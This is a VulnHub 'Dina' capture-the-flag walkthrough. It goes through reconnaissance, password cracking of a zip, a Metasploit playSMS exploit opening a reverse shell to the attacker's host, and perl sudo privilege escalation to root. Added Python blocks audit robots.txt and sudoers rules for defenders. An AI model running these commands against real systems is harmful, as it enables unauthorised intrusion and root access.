medium.com

Dina: 1.0.1 [VulnHub] — Walkthrough

Anu Shibin Joseph Raj

As always, I’m starting with the netdiscover tool to find the IP of the remote machine:

root@kali:~# netdiscover

Finding the IP of the remote machine using the netdiscover tool

Now let’s see the services running on the box with the help of the nmap tool by performing an aggressive scan on all the ports of the remote machine:

root@kali:~# nmap -p- -A 192.168.0.15

Finding exposed services on the remote machine using the nmap tool

There is only an HTTP service running on port 80. Let’s check what’s inside it.

HTTP (80):

The HTML landing page didn’t give much information other than what Dina meant.

http://192.168.0.15/

Next thing I looked into was the robots.txt file:

http://192.168.0.15/robots.txt
Content of the robots.txt file

That’s a lot of directories! I checked each of them one by one and found some passwords in the page source of one of them!

http://192.168.0.15/nothing/
Passwords found in one of the files mentioned in the robots.txt file
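The robots.txt step above is a reminder that every Disallow line is a disclosure to whoever reads the file, not a protection. The following is an added example (not code from the original walkthrough) that an administrator can run against a local web root: it parses robots.txt, reports each Disallow path together with whether that path really exists on disk, and refuses to look up entries that resolve outside the web root. The directory names and the robots.txt content are constructed for the demo.

```python
"""Audit what a site's robots.txt discloses.

Added example, not from the original walkthrough. It runs against a local
web root (constructed here under a temporary directory; the directory names
are assumptions) and reports every Disallow entry together with whether the
path really exists, so an administrator can see which listings point readers
of the file at real content that may deserve access control instead.
"""
import tempfile
from pathlib import Path

# Constructed robots.txt for the demo. The last entry shows why paths must be
# confined to the web root before being checked on disk.
SAMPLE_ROBOTS = """User-agent: *
# nothing to see here
Disallow: /nothing/
Disallow: /secure/
Disallow: /old-admin/
Disallow:
Disallow: /../../etc/
Crawl-delay: 10
"""


def parse_disallow(text: str) -> list[str]:
    """Return the non-empty Disallow paths in file order, without duplicates."""
    seen, paths = set(), []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # strip comments
        if not line.lower().startswith("disallow:"):
            continue
        path = line.split(":", 1)[1].strip()
        if path and path not in seen:                 # bare "Disallow:" allows everything
            seen.add(path)
            paths.append(path)
    return paths


def audit_webroot(webroot: str) -> dict[str, bool]:
    """Map each Disallow path in <webroot>/robots.txt to whether it exists on disk.

    Paths that resolve outside the web root are reported as False rather than
    being looked up, so a crafted entry cannot probe the rest of the filesystem.
    """
    root = Path(webroot).resolve()
    robots = root / "robots.txt"
    if not robots.is_file():
        return {}
    result = {}
    for path in parse_disallow(robots.read_text()):
        target = (root / path.lstrip("/")).resolve()
        inside = target == root or root in target.parents
        result[path] = inside and target.exists()
    return result


def build_sample_webroot() -> str:
    """Create a throwaway web root with robots.txt and two of the listed dirs."""
    webroot = tempfile.mkdtemp(prefix="robots-audit-")
    (Path(webroot) / "robots.txt").write_text(SAMPLE_ROBOTS)
    for name in ("nothing", "secure"):
        (Path(webroot) / name).mkdir()
    return webroot


if __name__ == "__main__":
    for path, exists in audit_webroot(build_sample_webroot()).items():
        print(f"{path:<16} {'exists, review' if exists else 'missing'}")
```

Entries that exist are the ones worth reviewing: if a directory is sensitive enough to hide from crawlers, it is sensitive enough to put behind authentication or remove from the web root, because robots.txt itself is public.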

Then I checked elsewhere inside the webpage but couldn’t find anything else. So I moved on to run a gobuster directory scan.

root@kali:~# gobuster dir -u http://192.168.0.15/ -w /usr/share/wordlists/dirb/big.txt

gobuster directory scan results

The gobuster scan result had one extra folder, called “secure”, which was not present in the robots.txt file.


There was a zip archive inside this folder. But it was password protected. So I used the zip2john tool to extract the password hash first. Then I used the john tool along with the passwords that we gathered from the webpage to crack the hash. This is how I did it:

root@kali:~# zip2john backup.zip > ziphash.txt
root@kali:~# cat ziphash.txt
root@kali:~# cat pass.txt
root@kali:~# john --wordlist=pass.txt ziphash.txt

Yay! We got the password! On extracting the ZIP and reading the content of the file inside, we get another directory name which is present on the HTTP server.

Content of the ZIP archive

I headed to that webpage and got a login page. After brute-forcing all the passwords that we have, I got the correct one:

Username: touhid

Password: diana

There was a playSMS application deployed in it. So I checked in Metasploit if there were any exploits available for it. And there was one! So I used it to get a reverse shell.

root@kali:~# msfdb start
root@kali:~# msfconsole -q
msf5 > search playsms
msf5 > use exploit/multi/http/playsms_filename_exec
msf5 > set RHOSTS 192.168.0.15
msf5 > set RPORT 80
msf5 > set TARGETURI /SecreTSMSgatwayLogin
msf5 > set USERNAME touhid
msf5 > set PASSWORD diana
msf5 > set LHOST 192.168.0.14
msf5 > exploit

Yay! We’re in 😃

Privilege escalation was even easier since perl had sudo execution rights with no password 😁

python -c 'import pty; pty.spawn("/bin/bash");'
www-data@Dina:/var/www/SecreTSMSgatwayLogin$ sudo -l
www-data@Dina:/var/www/SecreTSMSgatwayLogin$ sudo /usr/bin/perl -e 'exec "/bin/bash";'
root@Dina:/var/www/SecreTSMSgatwayLogin# cd /root
root@Dina:~# cat flag.txt
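The root shell above comes from a single sudoers line that lets www-data run perl without a password. The following is an added example (not code from the original walkthrough) of the audit a defender would run to catch that class of rule: it parses constructed sudoers lines (the user names and commands are assumptions) and reports every NOPASSWD rule whose command is a shell-capable interpreter or editor, or ALL.

```python
"""Flag sudoers rules that hand out a passwordless root shell.

Added example, not part of the original walkthrough. It parses a few
constructed sudoers lines (user names and commands are assumptions) and
reports NOPASSWD rules whose command can spawn a shell, which is the
misconfiguration the walkthrough abuses with perl.
"""
import os
import re
import shlex

# Binaries that can execute arbitrary commands once run as root. This is a
# starting point, not a complete list; extend it for your environment.
SHELL_CAPABLE = {"sh", "bash", "perl", "python", "python2", "python3", "ruby",
                 "vi", "vim", "less", "more", "awk", "find", "env"}

# Constructed sudoers content, not the real /etc/sudoers of the machine.
SAMPLE_SUDOERS = """
Defaults env_reset
root     ALL=(ALL:ALL) ALL
%sudo    ALL=(ALL:ALL) ALL
www-data ALL=(root) NOPASSWD: /usr/bin/perl   # the Dina-style rule
backup   ALL=(root) NOPASSWD: /usr/bin/rsync, /usr/bin/python3
deploy   ALL=(root) /usr/bin/systemctl restart app
ops      ALL=(ALL) NOPASSWD: ALL
"""

# user_or_group  host=(runas) [TAG:] command list
RULE_RE = re.compile(r"^(?P<who>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*(?P<spec>.*)$")


def parse_sudoers(text):
    """Return (who, runas, nopasswd, [commands]) for each user specification."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue                           # aliases etc. are out of scope here
        spec = m.group("spec").strip()
        nopasswd = spec.upper().startswith("NOPASSWD:")
        if nopasswd:
            spec = spec[len("NOPASSWD:"):]
        commands = [c.strip() for c in spec.split(",") if c.strip()]
        rules.append((m.group("who"), m.group("runas"), nopasswd, commands))
    return rules


def risky_rules(text):
    """Return (who, command) pairs that grant a shell-capable command without a password."""
    findings = []
    for who, _runas, nopasswd, commands in parse_sudoers(text):
        if not nopasswd:
            continue
        for cmd in commands:
            if cmd == "ALL":
                findings.append((who, cmd))
                continue
            binary = os.path.basename(shlex.split(cmd)[0])
            if binary in SHELL_CAPABLE:
                findings.append((who, cmd))
    return findings


if __name__ == "__main__":
    for who, cmd in risky_rules(SAMPLE_SUDOERS):
        print(f"{who:<10} may run {cmd!r} without a password: review this rule")
```

The fix for a finding is to drop the NOPASSWD tag, or better, replace the interpreter with a wrapper script that does only the one task the account needs and cannot be handed arbitrary code.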


Hooray! 💃

The End 😄